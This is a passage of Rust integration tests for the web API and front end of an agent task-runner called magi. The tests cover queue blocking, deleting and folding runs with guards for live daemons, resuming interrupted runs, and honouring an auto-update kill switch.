8675        assert_eq!(held["answers"][0]["answer"], "SQLite");
8676    }
8677
8678    #[tokio::test]
8679    async fn queue_json_shows_a_blocked_chain_and_its_stuck_root() {
8680        let fx = Fixture::start().await;
8681        let q = fx.queue();
8682        let mk = |title: &str| {
8683            Task::new(
8684                title.to_owned(),
8685                "Instruction".to_owned(),
8686                PathBuf::from("/repo"),
8687                Source::Human,
8688            )
8689        };
8690        let mut root = mk("root");
8691        root.hold_manual(Some("waiting".to_owned()));
8692        q.put(&mut root).unwrap();
8693        let mut mid = mk("mid");
8694        mid.block(vec![root.id.clone()], None);
8695        q.put(&mut mid).unwrap();
8696        let mut leaf = mk("leaf");
8697        leaf.block(vec![mid.id.clone()], None);
8698        q.put(&mut leaf).unwrap();
8699
8700        let list = fx.get("/api/queue").await.json();
8701        let find = |id: &str| {
8702            list.as_array()
8703                .unwrap()
8704                .iter()
8705                .find(|v| v["id"] == id)
8706                .unwrap()
8707                .clone()
8708        };
8709        let leaf_view = find(&leaf.id);
8710        assert_eq!(
8711            leaf_view["waits_on"],
8712            serde_json::json!([format!("{} (blocked → {} held)", mid.short(), root.short())])
8713        );
8714        assert_eq!(leaf_view["stuck_roots"], serde_json::json!([root.short()]));
8715        assert_eq!(
8716            find(&mid.id)["waits_on"],
8717            serde_json::json!([format!("{} (held)", root.short())])
8718        );
8719        assert_eq!(find(&root.id)["waits_on"], serde_json::json!([]));
8720    }
8721
8722    #[tokio::test]
8723    async fn delete_queue_task_deletes_file_and_guards_running_and_locked() {
8724        let fx = Fixture::start().await;
8725        let q = fx.queue();
8726
8727        // 1. A queued task with runs attached can be deleted.
8728        let mut t1 = Task::new(
8729            "Task 1".to_owned(),
8730            "Instruction 1".to_owned(),
8731            PathBuf::from("/repo"),
8732            Source::Human,
8733        );
8734        let run_id = "20260901-000000-r111";
8735        t1.runs.push(run_id.to_owned());
8736        write_run(&fx.runs(), run_id, RunStatus::Merged);
8737        q.put(&mut t1).expect("put t1");
8738
8739        // Delete by short id
8740        let res = fx.delete(&format!("/api/queue/{}", t1.short())).await;
8741        assert_eq!(res.status, 204);
8742        assert!(res.body.is_empty(), "204 No Content has no body");
8743        assert!(!q.path_of(&t1.id).exists(), "task file is deleted");
8744        assert!(
8745            fx.runs().join(run_id).exists(),
8746            "run directory must not be deleted when its task is deleted"
8747        );
8748
8749        // 2. A task a live daemon is running is refused with 409.
8750        let mut t2 = Task::new(
8751            "Task 2".to_owned(),
8752            "Instruction 2".to_owned(),
8753            PathBuf::from("/repo"),
8754            Source::Human,
8755        );
8756        t2.status = TaskStatus::Running;
8757        q.put(&mut t2).expect("put t2");
8758        let mut beat = crate::daemon::Status::new();
8759        beat.current = vec![crate::daemon::Current {
8760            task: t2.id.clone(),
8761            run: "20260901-000000-r222".to_owned(),
8762        }];
8763        beat.updated_at = jiff::Timestamp::now();
8764        crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8765            .expect("publish a heartbeat");
8766        let res = fx.delete(&format!("/api/queue/{}", t2.id)).await;
8767        assert_eq!(res.status, 409);
8768        assert!(
8769            res.json()["error"]
8770                .as_str()
8771                .unwrap()
8772                .contains("live daemon")
8773        );
8774        assert!(q.path_of(&t2.id).exists(), "a task in flight is kept");
8775
8776        // 3. The same `running` status and an orphaned lock, with no daemon
8777        // behind either, is a leftover and deletable. Before this the phone
8778        // refused it for good: the status never changes on its own and
8779        // nothing drops a lock whose process is gone.
8780        // The daemon is killed: the file stays, the heartbeat stops.
8781        beat.updated_at = jiff::Timestamp::now() - jiff::SignedDuration::from_secs(600);
8782        crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8783            .expect("leave a stale heartbeat");
8784        let mut t3 = Task::new(
8785            "Task 3".to_owned(),
8786            "Instruction 3".to_owned(),
8787            PathBuf::from("/repo"),
8788            Source::Human,
8789        );
8790        t3.status = TaskStatus::Running;
8791        q.put(&mut t3).expect("put t3");
8792        std::mem::forget(q.claim(&t3.id).expect("claim t3"));
8793        let res = fx.delete(&format!("/api/queue/{}", t3.id)).await;
8794        assert_eq!(res.status, 204);
8795        assert!(!q.path_of(&t3.id).exists(), "the task file is gone");
8796        assert!(
8797            q.claim(&t3.id).is_ok(),
8798            "the stale lock went with it, so the id is claimable again"
8799        );
8800
8801        // 4. Missing id returns 404
8802        let res = fx.delete("/api/queue/nonexistent").await;
8803        assert_eq!(res.status, 404);
8804    }
8805
8806    #[tokio::test]
8807    async fn delete_run_deletes_directory_and_guards_running_and_unfolded() {
8808        let fx = Fixture::start().await;
8809        let runs = fx.runs();
8810
8811        // 1. Finished and folded run can be deleted along with artifacts
8812        let run_id = "20260901-000000-fold";
8813        let mut state = RunState::new(
8814            PathBuf::from("/repo"),
8815            "main".to_owned(),
8816            "abc".to_owned(),
8817            "instruction".to_owned(),
8818            Config::default(),
8819        );
8820        state.id = run_id.to_owned();
8821        state.status = RunStatus::Merged;
8822        state.candidates.push(crate::run::Candidate {
8823            index: 0,
8824            label: 'A',
8825            agent: "a".to_owned(),
8826            branch: "b".to_owned(),
8827            worktree: PathBuf::from("/w"),
8828            summary: String::new(),
8829            stat: String::new(),
8830            files: 1,
8831            commits: 1,
8832            empty: false,
8833            failed: None,
8834            verified_noop: None,
8835            duration_ms: 0,
8836            folded: true,
8837        });
8838        let dir = runs.join(run_id);
8839        std::fs::create_dir_all(dir.join("artifacts")).expect("create artifacts");
8840        std::fs::write(dir.join("artifacts").join("patch.diff"), "dummy diff")
8841            .expect("write artifact");
8842        std::fs::write(dir.join("run.json"), serde_json::to_string(&state).unwrap())
8843            .expect("write run.json");
8844
8845        // Delete by short id
8846        let res = fx.delete(&format!("/api/runs/{}", state.short())).await;
8847        assert_eq!(res.status, 204);
8848        assert!(res.body.is_empty(), "204 has no body");
8849        assert!(!dir.exists(), "run directory and artifacts must be deleted");
8850
8851        // 2. A run a live daemon is working on is refused with 409. The
8852        // heartbeat is what makes it refusable: an unfinished run with no
8853        // daemon behind it is a leftover from a killed process, and case 1
8854        // above would otherwise be impossible to tell apart from this one.
8855        let run_running = "20260901-000000-rung";
8856        write_run(&runs, run_running, RunStatus::Prep);
8857        let mut beat = crate::daemon::Status::new();
8858        beat.current = vec![crate::daemon::Current {
8859            task: "20260901-000000-task".to_owned(),
8860            run: run_running.to_owned(),
8861        }];
8862        beat.updated_at = jiff::Timestamp::now();
8863        crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8864            .expect("publish a heartbeat");
8865        let res = fx.delete(&format!("/api/runs/{run_running}")).await;
8866        assert_eq!(res.status, 409);
8867        assert!(
8868            res.json()["error"]
8869                .as_str()
8870                .unwrap()
8871                .contains("live daemon"),
8872            "the refusal must say who is holding it"
8873        );
8874        assert!(
8875            runs.join(run_running).exists(),
8876            "a run in flight keeps its directory"
8877        );
8878
8879        // 3. Finished run with unfolded candidate is refused with 409 and mentions `magi fold`
8880        let run_unfolded = "20260901-000000-unfd";
8881        let mut state2 = RunState::new(
8882            PathBuf::from("/repo"),
8883            "main".to_owned(),
8884            "abc".to_owned(),
8885            "instruction".to_owned(),
8886            Config::default(),
8887        );
8888        state2.id = run_unfolded.to_owned();
8889        state2.status = RunStatus::Ready;
8890        state2.candidates.push(crate::run::Candidate {
8891            index: 0,
8892            label: 'A',
8893            agent: "a".to_owned(),
8894            branch: "b".to_owned(),
8895            worktree: PathBuf::from("/w"),
8896            summary: String::new(),
8897            stat: String::new(),
8898            files: 1,
8899            commits: 1,
8900            empty: false,
8901            failed: None,
8902            verified_noop: None,
8903            duration_ms: 0,
8904            folded: false,
8905        });
8906        let dir2 = runs.join(run_unfolded);
8907        std::fs::create_dir_all(&dir2).expect("create dir2");
8908        std::fs::write(
8909            dir2.join("run.json"),
8910            serde_json::to_string(&state2).unwrap(),
8911        )
8912        .expect("write run.json");
8913
8914        let res = fx.delete(&format!("/api/runs/{run_unfolded}")).await;
8915        assert_eq!(res.status, 409);
8916        assert!(res.json()["error"].as_str().unwrap().contains("magi fold"));
8917        assert!(dir2.exists(), "unfolded run directory is kept");
8918
8919        // 4. Missing id returns 404
8920        let res = fx.delete("/api/runs/nonexistent").await;
8921        assert_eq!(res.status, 404);
8922    }
8923
8924    /// The queue tiles on the Stats tab must render even on a home with no
8925    /// runs at all: queue state is not derived from run history, so hiding
8926    /// the whole dashboard body behind "no runs yet" would drop the one
8927    /// thing this tab promises unconditionally (queued/running/held/done).
8928    /// A DOM-level test would need a browser this suite does not have, so
8929    /// this pins the same invariant textually: `renderStatsQueue` is called
8930    /// once in `renderStats`, and that call sits outside the `if (!noRuns)`
8931    /// block that gates the run-derived panels.
8932    #[test]
8933    fn stats_queue_tiles_render_even_when_there_are_no_runs() {
8934        let start = APP_JS
8935            .find("function renderStats() {")
8936            .expect("renderStats");
8937        let end = start
8938            + APP_JS[start..]
8939                .find("function statsTile(")
8940                .expect("the next top-level function");
8941        let body = &APP_JS[start..end];
8942
8943        let gate_start = body.find("if (!noRuns) {").expect("the noRuns gate");
8944        let gate_end = gate_start
8945            + body[gate_start..]
8946                .find("}\n  renderStatsQueue")
8947                .expect("the gate's own closing brace, right before the unconditional call");
8948        let gated = &body[gate_start..gate_end];
8949
8950        assert_eq!(
8951            body.matches("renderStatsQueue(").count(),
8952            1,
8953            "renderStats must call renderStatsQueue exactly once: {body}"
8954        );
8955        assert!(
8956            !gated.contains("renderStatsQueue"),
8957            "renderStatsQueue must not be inside the `if (!noRuns)` block that hides the \
8958             run-derived panels on an empty run history - the queue panel has to render \
8959             regardless: {gated}"
8960        );
8961    }
8962
8963    #[test]
8964    fn web_ui_delete_contract_in_front_end() {
8965        // 1. API block has both delete endpoints
8966        assert!(APP_JS.contains("deleteRun:"));
8967        assert!(APP_JS.contains("deleteTask:"));
8968
8969        // 2. #runs-list card builder (createRunCard / updateRunCard) has no delete entry
8970        let run_cards_slice = &APP_JS[APP_JS.find("function createRunCard").unwrap()
8971            ..APP_JS.find("function renderRuns").unwrap()];
8972        assert!(!run_cards_slice.to_lowercase().contains("delete"));
8973
8974        // 3. Run detail has delete entry and reasons
8975        assert!(APP_JS.contains("renderRunDelete"));
8976        assert!(APP_JS.contains("runDeleteReason"));
8977        assert!(APP_JS.contains("magi fold"));
8978        assert!(APP_JS.contains("This run is still in flight and cannot be deleted."));
8979
8980        // 4. Two-step delete arming and focus on Cancel
8981        assert!(APP_JS.contains("cancel.focus"));
8982        assert!(APP_JS.contains("armedRunDelete"));
8983        assert!(APP_JS.contains("armedDelete"));
8984
8985        // 5. Running task has disabled delete
8986        assert!(APP_JS.contains("disabled: status === \"running\""));
8987    }
8988
8989    /// Every element a run card's updater reaches for must be in the `refs`
8990    /// the builder handed it.
8991    ///
8992    /// `createRunCard` builds its elements, appends them to the card, and then
8993    /// lists them again in `row.refs`. That second list is the one the updater
8994    /// uses, and nothing connects the two - an element can be built, appended
8995    /// and rendered, and still be missing from `refs`. `superseded` was, for
8996    /// two releases: `setText(r.superseded, ...)` threw on the first card, the
8997    /// exception took `syncList` with it, and the deck showed
8998    /// "13 runs, 2 in flight, 8 unreadable" above an empty list. The count
8999    /// line is computed before the cards, which is why the failure looked like
9000    /// a server that had lost its runs rather than a front end that had
9001    /// stopped rendering them.
9002    ///
9003    /// A `cargo test` cannot execute the front end, so this reads the two
9004    /// halves out of the source and compares them as sets. It is not a check
9005    /// on the wording of either list: adding an element, renaming one, or
9006    /// reordering them all keeps this passing, and only using one the builder
9007    /// never published fails it.
9008    #[test]
9009    fn every_ref_a_run_card_uses_is_one_its_builder_published() {
9010        let build = APP_JS
9011            .find("function createRunCard")
9012            .expect("createRunCard exists");
9013        let update = APP_JS
9014            .find("function updateRunCard")
9015            .expect("updateRunCard exists");
9016        let end = APP_JS
9017            .find("function renderRuns")
9018            .expect("renderRuns exists");
9019
9020        // The builder's published set: the object literal assigned to `refs`.
9021        let builder = &APP_JS[build..update];
9022        let open = builder.find("refs = {").expect("createRunCard sets refs");
9023        let literal = &builder[open + "refs = {".len()..];
9024        let close = literal.find('}').expect("the refs literal is closed");
9025        let published: HashSet<&str> = literal[..close]
9026            .split(',')
9027            // `name` and `name: value` both bind `name`.
9028            .filter_map(|entry| entry.split(':').next())
9029            .map(str::trim)
9030            .filter(|name| !name.is_empty())
9031            .collect();
9032        assert!(
9033            published.len() > 5,
9034            "the refs literal did not parse into names: {published:?}"
9035        );
9036
9037        // What the updaters reach for: every `r.<name>`, where `r` is the
9038        // `const r = row.refs` alias both functions open with.
9039        let mut used: Vec<&str> = Vec::new();
9040        let updaters = &APP_JS[update..end];
9041        for (at, _) in updaters.match_indices("r.") {
9042            // `r` must be the whole identifier, not the tail of another one
9043            // (`Number.parseFloat`, `pr.url`, `for.` and friends).
9044            let before = updaters[..at].chars().next_back();
9045            if before.is_some_and(|c| c.is_alphanumeric() || c == '_' || c == '$' || c == '.') {
9046                continue;
9047            }
9048            let rest = &updaters[at + 2..];
9049            let len = rest
9050                .find(|c: char| !(c.is_alphanumeric() || c == '_' || c == '$'))
9051                .unwrap_or(rest.len());
9052            if len > 0 {
9053                used.push(&rest[..len]);
9054            }
9055        }
9056        assert!(
9057            used.len() > 5,
9058            "no `r.<name>` uses were found; the updaters must have been rewritten: {used:?}"
9059        );
9060
9061        let missing: Vec<&str> = used
9062            .iter()
9063            .copied()
9064            .filter(|name| !published.contains(name))
9065            .collect();
9066        assert!(
9067            missing.is_empty(),
9068            "a run card's updater reaches for {missing:?}, which `createRunCard` \
9069             never put in `refs` - every card will throw and the list will \
9070             render empty under a count line that says otherwise. Published: \
9071             {published:?}"
9072        );
9073    }
9074
9075    #[tokio::test]
9076    async fn folding_from_the_phone_reports_what_it_removed() {
9077        let fx = Fixture::start().await;
9078        let runs = fx.runs();
9079
9080        // A run with no candidates has nothing to fold, which is a 200 with an
9081        // honest count rather than an error: the operator asked for the trees
9082        // to be gone and they are.
9083        let id = "20260901-000000-fold";
9084        write_run(&runs, id, RunStatus::Stalled);
9085        let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
9086        assert_eq!(res.status, 200);
9087        assert_eq!(res.json()["removed_count"], 0);
9088        assert_eq!(res.json()["run"], id);
9089        assert!(
9090            runs.join(id).exists(),
9091            "a fold keeps the run's record; only the worktrees go"
9092        );
9093    }
9094
9095    #[tokio::test]
9096    async fn folding_an_unreadable_run_falls_back_to_removing_it_wholesale() {
9097        let fx = Fixture::start().await;
9098        let runs = fx.runs();
9099        let wt = fx.home.path().join("wt").join("magi").join("dead");
9100        let id = "20260901-000000-dead";
9101        std::fs::create_dir_all(runs.join(id)).expect("run dir");
9102        std::fs::write(runs.join(id).join("run.json"), "not json").expect("garbage state");
9103        std::fs::create_dir_all(&wt).expect("worktree dir");
9104
9105        let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
9106        assert_eq!(res.status, 200, "{}", res.body);
9107        assert!(
9108            res.json()["removed_count"].as_u64().unwrap() > 0,
9109            "the worktree this build could not read a state for still went"
9110        );
9111        assert!(
9112            !runs.join(id).exists(),
9113            "an unreadable run has no candidate list to fold selectively, so \
9114             the whole record goes - same as `magi fold` on the CLI"
9115        );
9116    }
9117
9118    #[tokio::test]
9119    async fn deleting_an_unreadable_run_removes_it_wholesale() {
9120        let fx = Fixture::start().await;
9121        let runs = fx.runs();
9122        let wt = fx.home.path().join("wt").join("magi").join("gone");
9123        let id = "20260901-000000-gone";
9124        std::fs::create_dir_all(runs.join(id)).expect("run dir");
9125        std::fs::write(runs.join(id).join("run.json"), "not json").expect("garbage state");
9126        std::fs::create_dir_all(&wt).expect("worktree dir");
9127
9128        let res = fx.delete(&format!("/api/runs/{id}")).await;
9129        assert_eq!(res.status, 204, "{}", res.body);
9130        assert!(!runs.join(id).exists(), "the broken record is gone");
9131        assert!(!wt.exists(), "its worktree is gone too");
9132    }
9133
9134    #[tokio::test]
9135    async fn folding_is_refused_while_a_daemon_is_working_on_the_run() {
9136        let fx = Fixture::start().await;
9137        let runs = fx.runs();
9138        let id = "20260901-000000-live";
9139        write_run(&runs, id, RunStatus::Implementing);
9140
9141        let mut beat = crate::daemon::Status::new();
9142        beat.current = vec![crate::daemon::Current {
9143            task: "20260901-000000-task".to_owned(),
9144            run: id.to_owned(),
9145        }];
9146        beat.updated_at = jiff::Timestamp::now();
9147        crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
9148            .expect("publish a heartbeat");
9149
9150        let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
9151        assert_eq!(res.status, 409);
9152        assert!(
9153            res.json()["error"]
9154                .as_str()
9155                .unwrap()
9156                .contains("live daemon"),
9157            "folding under a running agent would pull its worktree away"
9158        );
9159    }
9160
9161    #[tokio::test]
9162    async fn fold_merged_requires_a_pr_url() {
9163        let fx = Fixture::start().await;
9164        let runs = fx.runs();
9165        let id = "20260901-000000-nourl";
9166        write_run(&runs, id, RunStatus::Blocked);
9167
9168        let res = fx
9169            .post(&format!("/api/runs/{id}/fold-merged"), Some("{}"))
9170            .await;
9171        assert_eq!(res.status, 400, "{}", res.body);
9172
9173        let blank = fx
9174            .post(
9175                &format!("/api/runs/{id}/fold-merged"),
9176                Some(r#"{"pr_url":"   "}"#),
9177            )
9178            .await;
9179        assert_eq!(blank.status, 400, "{}", blank.body);
9180    }
9181
9182    #[tokio::test]
9183    async fn fold_merged_is_404_for_an_unknown_run() {
9184        let fx = Fixture::start().await;
9185        let res = fx
9186            .post(
9187                "/api/runs/nosuchrun/fold-merged",
9188                Some(r#"{"pr_url":"https://github.com/owner/repo/pull/1"}"#),
9189            )
9190            .await;
9191        assert_eq!(res.status, 404, "{}", res.body);
9192    }
9193
9194    #[tokio::test]
9195    async fn fold_merged_is_refused_while_a_daemon_is_working_on_the_run() {
9196        let fx = Fixture::start().await;
9197        let runs = fx.runs();
9198        let id = "20260901-000000-livemerge";
9199        write_run(&runs, id, RunStatus::Blocked);
9200
9201        let mut beat = crate::daemon::Status::new();
9202        beat.current = vec![crate::daemon::Current {
9203            task: "20260901-000000-task".to_owned(),
9204            run: id.to_owned(),
9205        }];
9206        beat.updated_at = jiff::Timestamp::now();
9207        crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
9208            .expect("publish a heartbeat");
9209
9210        let res = fx
9211            .post(
9212                &format!("/api/runs/{id}/fold-merged"),
9213                Some(r#"{"pr_url":"https://github.com/owner/repo/pull/1"}"#),
9214            )
9215            .await;
9216        assert_eq!(res.status, 409, "{}", res.body);
9217        assert!(
9218            res.json()["error"]
9219                .as_str()
9220                .unwrap()
9221                .contains("live daemon"),
9222            "correcting a run's merge underneath a running agent would race \
9223             whatever it is doing to the same `status`/`merge` fields"
9224        );
9225    }
9226
9227    /// A pull request `gh` cannot even ask about (no such remote, no such
9228    /// repository) must never be recorded as a merge on a guess - the same
9229    /// refusal `land::correct_manual_merge` gives `magi fold --merged` on the
9230    /// command line, reached here through the phone route instead.
9231    #[tokio::test]
9232    async fn fold_merged_refuses_a_pull_request_it_cannot_confirm_is_merged() {
9233        let fx = Fixture::start().await;
9234        let runs = fx.runs();
9235        let id = "20260901-000000-unconfirmed";
9236        write_run(&runs, id, RunStatus::Blocked);
9237
9238        let res = fx
9239            .post(
9240                &format!("/api/runs/{id}/fold-merged"),
9241                Some(r#"{"pr_url":"https://github.com/owner/repo/pull/1"}"#),
9242            )
9243            .await;
9244        assert_eq!(res.status, 400, "{}", res.body);
9245        assert_eq!(
9246            read_run(&runs, id).unwrap().status,
9247            RunStatus::Blocked,
9248            "a pull request that could not be confirmed merged must leave \
9249             the run exactly where it was"
9250        );
9251    }
9252
9253    #[tokio::test]
9254    async fn resume_is_refused_unless_the_run_stopped_somewhere_it_can_continue() {
9255        let fx = Fixture::start().await;
9256        let runs = fx.runs();
9257
9258        // Only a finished run and a failed one. An *interrupted* run - a
9259        // parked one, or one whose daemon was killed mid-node - is the case
9260        // resuming exists for: run 4043 sat at `reviewing` with the deck
9261        // saying it could not be resumed, which was the one state where
9262        // resuming was the only sensible answer.
9263        for (status, word) in [
9264            (RunStatus::Merged, "merged"),
9265            (RunStatus::Ready, "ready"),
9266            (RunStatus::Failed, "failed"),
9267        ] {
9268            let id = format!("20260901-000000-{}", &word[..4]);
9269            write_run(&runs, &id, status);
9270            let res = fx.post(&format!("/api/runs/{id}/resume"), None).await;
9271            assert_eq!(res.status, 409, "{word} must not be resumable");
9272            let err = res.json()["error"].as_str().unwrap().to_owned();
9273            assert!(err.contains(word), "the refusal names the status: {err}");
9274        }
9275
9276        // And an interrupted run is accepted: 202, with the resume running in
9277        // the background. `Runner::resume` fails immediately here - the
9278        // fixture's run points at a repository that does not exist - which is
9279        // the point: the handler must not wait for it to find out.
9280        let mid = "20260901-000000-midf";
9281        write_run(&runs, mid, RunStatus::Reviewing);
9282        let res = fx.post(&format!("/api/runs/{mid}/resume"), None).await;
9283        assert_eq!(res.status, 202, "an interrupted run is resumable");
9284    }
9285
9286    #[tokio::test]
9287    async fn resume_is_refused_while_the_loop_is_running() {
9288        let fx = Fixture::start().await;
9289        let runs = fx.runs();
9290        let stalled = "20260901-000000-stal";
9291        write_run(&runs, stalled, RunStatus::Stalled);
9292
9293        // The loop is busy with a *different* run, and that is still a
9294        // refusal: a manual resume must never race whatever the loop itself
9295        // is already driving, whether that is one run or several.
9296        let mut beat = crate::daemon::Status::new();
9297        beat.current = vec![crate::daemon::Current {
9298            task: "20260901-000000-task".to_owned(),
9299            run: "20260901-000000-othr".to_owned(),
9300        }];
9301        beat.updated_at = jiff::Timestamp::now();
9302        crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
9303            .expect("publish a heartbeat");
9304
9305        let res = fx.post(&format!("/api/runs/{stalled}/resume"), None).await;
9306        assert_eq!(res.status, 409);
9307        let err = res.json()["error"].as_str().unwrap().to_owned();
9308        assert!(err.contains("othr"), "it names what the loop is on: {err}");
9309        assert!(err.contains("stop it first"), "{err}");
9310    }
9311
9312    #[test]
9313    fn a_run_cannot_be_resumed_twice_at_once() {
9314        let home = TempDir::new().expect("temp home");
9315        let ui = Ui::new(
9316            Queue::at(home.path().join("queue")),
9317            Questions::at(home.path().join("questions")),
9318            Talks::at(home.path().join("talks")),
9319            home.path().join("runs"),
9320            home.path().to_path_buf(),
9321            PathBuf::from("/repo"),
9322        )
9323        .with_worktrees_root(home.path().join("wt"));
9324        let first = ui.begin_resume("20260901-000000-once").expect("claimed");
9325        let again = ui.begin_resume("20260901-000000-once");
9326        assert!(again.is_err(), "a second tap must not start a second graph");
9327        drop(first);
9328        assert!(
9329            ui.begin_resume("20260901-000000-once").is_ok(),
9330            "and the claim is released when the attempt ends"
9331        );
9332    }
9333
9334    #[test]
9335    fn talk_thinking_tracks_only_its_held_turn_claim() {
9336        let home = TempDir::new().expect("temp home");
9337        let ui = Ui::new(
9338            Queue::at(home.path().join("queue")),
9339            Questions::at(home.path().join("questions")),
9340            Talks::at(home.path().join("talks")),
9341            home.path().join("runs"),
9342            home.path().to_path_buf(),
9343            PathBuf::from("/repo"),
9344        )
9345        .with_worktrees_root(home.path().join("wt"));
9346        let id = "20260901-000000-once";
9347
9348        assert!(!ui.is_thinking(id), "an unclaimed talk is not thinking");
9349        let turn = ui.begin_talk_turn(id).expect("claim turn");
9350        assert!(ui.is_thinking(id), "the held guard is reported as thinking");
9351        assert!(
9352            !ui.is_thinking("20260901-000000-other"),
9353            "one talk's turn does not make another talk busy"
9354        );
9355        drop(turn);
9356        assert!(!ui.is_thinking(id), "dropping the guard releases thinking");
9357    }
9358
9359    #[tokio::test]
9360    async fn an_upgrade_is_refused_when_the_loop_belongs_to_another_process() {
9361        let fx = Fixture::start().await;
9362        // Somebody else's `magi serve` owns the queue. Replacing this binary
9363        // would leave that process running an old one against the same
9364        // claims, which is worse than refusing.
9365        let mut beat = crate::daemon::Status::new();
9366        beat.pid = 4321;
9367        beat.updated_at = jiff::Timestamp::now();
9368        crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
9369            .expect("publish a heartbeat");
9370
9371        let res = fx.post("/api/upgrade", None).await;
9372        assert_eq!(res.status, 409);
9373        let err = res.json()["error"].as_str().unwrap().to_owned();
9374        assert!(err.contains("4321"), "the refusal names the owner: {err}");
9375        assert!(err.contains("old one against the same queue"), "{err}");
9376    }
9377
9378    /// [`should_spawn_recheck`] must refuse for the same two reasons
9379    /// [`Checker::new`](crate::updater::Checker::new) and `upgrade_post`
9380    /// already do: `mode = "off"` and the `MAGI_NO_AUTOUPDATE` kill switch.
9381    /// Purely a predicate over config and the environment - no network, no
9382    /// disk, no runtime - so unlike the fixture-based tests around it this
9383    /// one needs neither.
9384    #[test]
9385    fn recheck_never_spawns_when_checking_is_off_or_killed_by_env() {
9386        assert!(!should_spawn_recheck(&crate::config::Update {
9387            mode: UpdateMode::Off,
9388            interval: None,
9389        }));
9390
9391        // SAFETY: single-threaded as far as this variable goes, the same
9392        // reasoning `updater::tests::env_kill_switch_semantics` relies on.
9393        unsafe {
9394            std::env::set_var(crate::updater::NO_AUTOUPDATE_ENV, "1");
9395        }
9396        let killed = should_spawn_recheck(&crate::config::Update {
9397            mode: UpdateMode::Notify,
9398            interval: None,
9399        });
9400        unsafe {
9401            std::env::remove_var(crate::updater::NO_AUTOUPDATE_ENV);
9402        }
9403        assert!(
9404            !killed,
9405            "MAGI_NO_AUTOUPDATE must stop the periodic recheck, not just the \
9406             one-time startup check"
9407        );
9408
9409        assert!(should_spawn_recheck(&crate::config::Update {
9410            mode: UpdateMode::Notify,
9411            interval: None,
9412        }));
9413    }
9414
9415    /// [`recheck_poll_period`] must track a configured `[update] interval`
9416    /// shorter than its own default ceiling - a fixed sleep here would leave
9417    /// an operator's short interval waiting on the next wake-up instead of on
9418    /// `should_check`, which is the same bug this whole task exists to fix,
9419    /// just one level down.
9420    #[test]
9421    fn recheck_poll_period_tracks_a_short_configured_interval() {
9422        let short = crate::config::Update {
9423            mode: UpdateMode::Notify,
9424            interval: Some("1m".to_owned()),
9425        };
9426        let period = recheck_poll_period(&short);
9427        assert!(
9428            period <= Duration::from_secs(30),
9429            "a one-minute interval must wake the task far sooner than the \
9430             default ceiling, or the deck would not notice within the \
9431             interval the operator configured: got {period:?}"
9432        );
9433
9434        let default = crate::config::Update {
9435            mode: UpdateMode::Notify,
9436            interval: None,
9437        };
9438        assert_eq!(
9439            recheck_poll_period(&default),
9440            UPDATE_RECHECK_POLL_MAX,
9441            "the default day-long interval should poll at the (capped) \
9442             ceiling rather than needlessly often"
9443        );
9444    }
9445
9446    /// [`update_recheck_due`] must not repeat a check made moments ago, the
9447    /// same throttle `updater::Checker::should_check` already gives the
9448    /// CLI's notify mode. Built over an explicit state file via
9449    /// `Checker::for_test`, never `Checker::new`, so this cannot read or
9450    /// write the operator's real `last_update_check.json` - and therefore
9451    /// cannot flake on whatever that file happens to say on the machine
9452    /// running the test.
9453    #[test]
9454    fn recheck_skips_the_network_before_the_interval_elapses() {
9455        let dir = TempDir::new().expect("temp dir");
9456        let path = dir.path().join("state.json");
9457        let state = kaishin::UpdateCheckState {
9458            last_checked_unix: jiff::Timestamp::now().as_second() as u64,
9459            last_known_latest: None,
9460            last_known_url: None,
9461        };
9462        kaishin::save_check_state(&path, &state).expect("seed a just-checked state");
9463
9464        let checker = crate::updater::Checker::for_test(Duration::from_secs(24 * 60 * 60), path);
9465        assert!(
9466            !update_recheck_due(&checker, None),
9467            "a check made moments ago must not be repeated before the \
9468             configured interval elapses"
9469        );
9470    }
9471
9472    /// An upgrade this deck already started must not be raced by a recheck
9473    /// that discovers a newer release mid-install - regardless of what
9474    /// `should_check` says, which is why the state file here is missing
9475    /// entirely: read alone, that alone would answer "never checked, go
9476    /// ahead".
9477    #[test]
9478    fn recheck_defers_to_an_upgrade_already_in_flight() {
9479        let dir = TempDir::new().expect("temp dir");
9480        let path = dir.path().join("state.json");
9481        let checker = crate::updater::Checker::for_test(Duration::from_secs(60 * 60), path);
9482        let progress = crate::updater::Progress::new("0.8.0".to_owned(), "v0.9.0".to_owned());
9483
9484        assert!(
9485            !update_recheck_due(&checker, Some(&progress)),
9486            "a recheck must not run while an upgrade this deck started is \
9487             still moving"
9488        );
9489    }
9490
9491    #[tokio::test]
9492    async fn an_upgrade_is_refused_by_the_no_autoupdate_kill_switch() {
9493        // The same env var the background check honours (`disabled_by_env`)
9494        // must also stop a button press before it ever calls
9495        // `Checker::newer_release` - an operator who set `MAGI_NO_AUTOUPDATE`
9496        // means "never contact GitHub from this process", and a tap on the
9497        // upgrade button must not override that any more than a broken
9498        // `magi.toml` may. Left unset, this fixture's default config would
9499        // otherwise reach a real, unauthenticated GitHub call.
9500        //
9501        // SAFETY: single-threaded as far as this variable goes - nothing else
9502        // in this binary reads `MAGI_NO_AUTOUPDATE` concurrently, the same
9503        // reasoning `updater::tests::env_kill_switch_semantics` relies on.
9504        unsafe {
9505            std::env::set_var(crate::updater::NO_AUTOUPDATE_ENV, "1");
9506        }
9507        let fx = Fixture::start().await;
9508        let res = fx.post("/api/upgrade", None).await;
9509        unsafe {
9510            std::env::remove_var(crate::updater::NO_AUTOUPDATE_ENV);
9511        }
9512        assert_eq!(res.status, 200, "not 202: nothing was set in motion");
9513        let body = res.json();
9514        assert!(body["to"].is_null(), "there was no release to move to");
9515        assert!(body["parked"].is_null(), "and nothing was parked");
9516        assert!(
9517            body["detail"]
9518                .as_str()
9519                .unwrap()
9520                .contains("disabled by MAGI_NO_AUTOUPDATE"),
9521            "{body:?}"
9522        );
9523    }
9524
9525    #[tokio::test]
9526    async fn an_upgrade_with_nothing_to_install_changes_nothing() {
9527        // `[update] mode = "off"` so `updater::Checker::new` returns `None`
9528        // and the route answers from its own logic.
9529        //
